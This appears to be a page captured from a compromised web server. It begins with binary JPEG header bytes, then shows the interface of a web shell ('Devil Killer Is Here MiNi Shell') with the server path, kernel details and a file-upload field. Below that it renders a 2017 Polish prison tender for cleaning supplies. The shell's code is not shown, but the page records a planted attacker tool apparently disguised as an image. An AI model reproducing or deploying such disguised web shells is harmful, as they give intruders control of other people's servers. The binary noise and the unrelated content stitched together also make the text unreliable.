JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170313/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170313/42394-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.sw.gov.pl' target='_blank'>http://www.sw.gov.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 42394 - 2017
              z dnia 2017-03-13 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Wojkowice: Dostawa środków czystości<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Zakład Karny, krajowy numer identyfikacyjny
              31976000000, ul.
              ul. Sobieskiego 
              298,
              42-580  
              Wojkowice, woj.
              śląskie, państwo
              Polska, tel.
              322 961 600, e-mail
              zk_wojkowice@sw.gov.pl, faks
              32 769 75 75.
              <br />
              Adres strony internetowej (URL): www.sw.gov.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Zakład Karny</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.sw.gov.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br />
                Adres:
                <br /></div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Dostawa środków czystości<br /><b>Numer referencyjny: </b>D/Kw 223/3/17<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Zadanie 1  Środki czystości ogólne  część 1
1.	Środek odkażająco- dezynfekujący, typu LIZOL, lub równoważny o właściwościach odkażająco  dezynfekujących. Opakowanie 0,5- 1l.  ilość 2300 litrów.
2.	Płyn do usuwania kamienia i rdzy z urządzeń sanitarnych. Opakowanie ok. 0,5 l.  ilość 1400 litrów.
3.	Odświeżacz powietrza w żelu, opakowanie ok.. 150g.  ilość 120 sztuk.
4.	Preparat do pielęgnacji mebli, Opakowanie max. 0,5l.  ilość 420 litrów.
5.	Pasta do obuwia, czarna, w płynie, poj 0,1 l  ilość 10 sztuk.
6.	Tabletki do zmywarki usuwające zabrudzenia z naczyń. Opakowanie od 50 do 300 szt.  ilość 500 sztuk.
7.	Sól do zmywarki, zapobiegająca osadzaniu się kamienia w urządzeniu.. Opakowanie od 1 do 6 kg  ilość 10 kg.
8.	Nabłyszczacz do zmywarki, do płukania i nabłyszczania naczyń. Opakowanie od 1 do 5 litrów  ilość 10 litrów.
9.	Krem do rąk. Opakowanie 50 ml.  ilość 250 sztuk.

Zadanie 2  Środki czystości ogólne  część 2
1.	Papier toaletowy dwuwarstwowy, celulozowy, biały, gofrowany, białość ok. 80%, gramatura nie mniej niż 2x16 g/m2, perforacja co 11 cm, długość nie mniej niż 20 m, szerokość nie mniej niż 9,5 cm, średnica nie mniej niż 11,5 cm, tuleja ok. 45 mm, waga rolki bez tulei nie mniej niż 0,061 kg, tolerancja parametrów +/- 5% - ilość 7000 rolek.
2.	Woreczki HDPE o wym. 26x35 cm, dopuszczone do kontaktu z żywnością. Opakowanie 1000 szt.  ilość 60 opak.
3.	Reklamówka jednorazowa o wym. 25x45 cm. koloru białego, opakowanie 200 szt  ilość 90 opak.
4.	Rękawice foliowe jednorazowe, dopuszczone do kontaktu z żywnością, rozmiar XL (opakowanie 100 szt.)  ilość 1000 opak.
5.	Kubki jednorazowe białe poj. 0,2 l.  ilość 13000 sztuk. 
6.	Ściągaczka do ściągania wody z podłogi z możliwością montażu kija, szerokość 50-75 cm  ilość 250 sztuk.
7.	Szczotka do zamiatania, oprawa plastikowa z otworem do wkręcenia kija, miękkie włosie szer. ok. 30 cm.  ilość 250 sztuk.
8.	Szczotka ryżowa ręczna  ilość 60 sztuk.
9.	Szczotka ryżowa z otworem na kij  ilość 60 sztuk.
10.	Szczotka ręczna z tworzywa sztucznego, odporna na wysoką temperaturę min. 130°C  ilość 60 sztuk.
11.	Szczotka z tworzywa sztucznego do szorowania, z otworem na kij z gwintem  ilość 60 sztuk.
12.	Szczotka "ulicówka" do zamiatania terenów zewnętrznych z otworem na kij szerokość 30  40 cm.  ilość 75 sztuk.
13.	Szczotka plastikowa do czyszczenia WC z podstawą  ilość 220 kompletów.
14.	Kij do miotły i mopa, drewniany z gwintem na końcu, długość ok. 150 cm  ilość 330 sztuk.
15.	Kij do miotły i mopa, metalowy z gwintem na końcu, nieskładany, długość od 150 do 170cm.  ilość 80 sztuk.
16.	Zestaw zmiotka +szufelka  ilość 220 kompletów.
17.	Miska plastikowa okrągła o średnicy 40-50cm, wysokość 15-20 cm  ilość 150 sztuk.
18.	Wiadro plastikowe o pojemności  10l.  ilość 150 sztuk.
19.	Zmywak - gąbka przeznaczona do mycia naczyń. Z jednej strony gąbka, z drugiej materiał umożliwiający szorowanie.  ilość 300 sztuk.
20.	Zestaw do sprzątania: mop sznurkowy + styl + wiadro + wyciskacz  ilość 75 kompletów.
21.	Wkład do mopa sznurkowego  ilość 150 sztuk.
22.	Kosz na śmieci z tworzywa, otwierany nogą tzw. pedałowy o pjemności 25l  ilość 30 sztuk.
23.	Zestaw do sprzątania: stelaż mopa płaskiego + wkład do mopa + styl metalowy nieskładany (wymiary mopa min. 400x100 mm)  ilość 80 kompletów.
24.	Wkład do mopa płaskiego (wymiary mopa min. 400x100 mm)  ilość 100 sztuk.
25.	Wkład do mopa płaskiego (wymiary mopa min. 400x150 mm)  ilość 30 sztuk.
26.	Worki na śmieci koloru czerwonego o poj 60 litrów  ilość 2500 sztuk.
27.	Jednorazowe worki z tworzywa sztucznego na odpady HDPE, worki średnie, w kolorze czarnym, o poj. 60 litrów., 60x71cm., grubość min. 0,010 mm. Ilość worków w rolce: min. 50, PN-EN 13592+A1:2007/AC:2008.  ilość 94200 sztuk.
28.	Jednorazowe worki z tworzywa sztucznego na odpady LDPE, worki duże, grube, w kolorze czarnym lub niebieskim, o poj. 120 litrów, 70x110 cm., grubość min. 0,03 mm. +/-5%,. Ilość worków w rolce: min. 25, PN-EN 13592+A1:2007/AC:2008.  ilość 37200 sztuk.
29.	Rękawice lateksowe o obniżonej zawartości protein (nie więcej niż 80g/g), lekko pudrowane, jednorazowego użytku, niesterylne, pasujące na prawą i lewą rękę. Powierzchnia rękawic bez zgrubień i pęcherzy, rant mankietu równomiernie zrolowany. Dobra elastyczność i rozciągliwość, wysoka odporność na uszkodzenia mechaniczne - siła zrywania po starzeniu min. 7N. AQL 1,5. Grubość rękawicy na palcach 0,12mm +/-0,01mm, w części dłoniowej 0,11mm +/-0,01mm, na mankiecie 0,09mm +/-0,01mm, minimalna długość rękawicy 240mm. Na opakowaniu powinny być umieszczone: data produkcji, termin ważności, numer serii, nazwa i adres producenta, informacje w języku polskim oraz znak CE (zamieszczone fabrycznie na opakowaniu jednostkowym). Rozmiar S- w ilości 6800 szt. tj. 68 opakowań , rozmiar M- w ilości 12000 szt. tj. 120 opakowań, rozmiar L- w ilości 60000 szt. tj. 600 opakowań, XL- w ilości 28000 szt. tj. 280 opakowań. Rękawice zgodne z normami EN 455 część 1, 2, 3 i 4 oraz zaklasyfikowane jako środek ochrony osobistej Kategorii I. Pakowane po 100 szt  ilość 106800 sztuk.
30.	Szczoteczka do zębów dla dorosłych  ilość 200 sztuk.
31.	Ręczniki papierowe jednorazowe, składane ZZ, surowiec makulatura o kolorze naturalnym lub zielonym, 1  warstwowe, gramatura min. 36g/m2, zapach neutralny, nie ulegający pyleniu w stanie suchym, wodotrwały, gofrowany, wymiary listka: 230 mm x 250 mm, waga pakietu min. 0,415 kg., (tolerancja 1%), pakiet min. 200 listków.  ilość 7500 opak.

Zadanie 3  Środki czystości dla bloku kuchennego
1.	Środek do mycia urządzeń sanitarnych w zakładach gastronomicznych. Środek zawierający czynny chlor.  Opakowanie max. 15l.  ilość 1300 litrów.
2.	Neutralny, skoncentrowany środek przeznaczony do ręcznego mycia naczyń w zakładach gastronomii.  Opakowanie max. 15l.  ilość 4000 litrów.
3.	Preparat myjący do rąk usuwający zabrudzenia organiczne i nieorganiczne, antybakteryjny. Nie podrażniający skóry.  Opakowanie max. 15l.  ilość 2500 litrów.
4.	Alkaliczny środek do mycia i dezynfekcji maszyn, ścian,posadzek oraz wszelkich powierzchni produkcyjnych (aluminiowe, ocynkowane, nierdzewne). Preparat zawierający inhibitory korozji, charakteryzujący się działaniem bakteriobójczym, grzybobójczym, nie zawierający aktywnego chloru. Opakowanie max. 15l.  ilość 3500 litrów.
5.	Zasadowy płyn do mycia w zmywarkach,  przyrządów kuchennych, garnków, tac , zawierający aktywny chlor, usuwający resztki jedzenia wszelkiego typu, szczególnie przyschnięte osady z białka i skrobii. (możliwość stosowania w zmywarce WINTERHALTER GS 650. Opakowanie ok. 25l.  ilość 800 litrów.
6.	Środek nabłyszczająco konserwujący, do maszynowego i przemysłowego zastosowania, nie wymagający spłukiwania. Opakowanie max. 15l.  ilość 800 litrów.
7.	Kwaśny środek do mycia i dezynfekcji maszyn, ścian,posadzek (usuwający kamień, rdze, i uciążliwy brud ). Preparat zawierający inhibitory korozji, charakteryzujący się działaniem bakteriobójczym, grzybobójczym. Opakowanie max. 15l.  ilość 300 litrów.
8.	Mleczko do czyszczenia, usuwające brud, kamień, rdzę zawierające substancję ścierną . Opakowanie max. 1 l.  ilość 150 litrów.

<br /><br /><b>II.5) Główny kod CPV: </b>39830000-9<br /><b> Dodatkowe kody CPV:</b>39811300-3,
                39813000-4,
                39812200-9,
                39831210-1,
                33711540-4,
                33760000-5,
                19520000-7,
                18424300-0,
                39222120-1,
                39224000-8,
                39224200-0,
                39224310-4,
                39221240-1,
                39224330-0,
                39224320-7,
                39224340-3,
                19520000-7,
                33141000-0,
                33711710-7,
                33763000-5,
                39831240-0,
                39832000-3,
                39822000-0,
                39831210-1,
                39813000-4<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w miesiącach: 12<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie określił warunków w tym zakresie<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie określił warunków w tym zakresie<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Zamawiający nie określił warunków w tym zakresie<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br /><br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Na podstawie art. 24 ust. 11 ustawy PZP Wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5 ustawy PZP (informacji z sesji otwarcia ofert) przekaże zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt. 23 ustawy PZP. Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu. Wzór oświadczenia o stanowi załącznik nr 7 do SIWZ.</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>maksymalny termin płatności</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
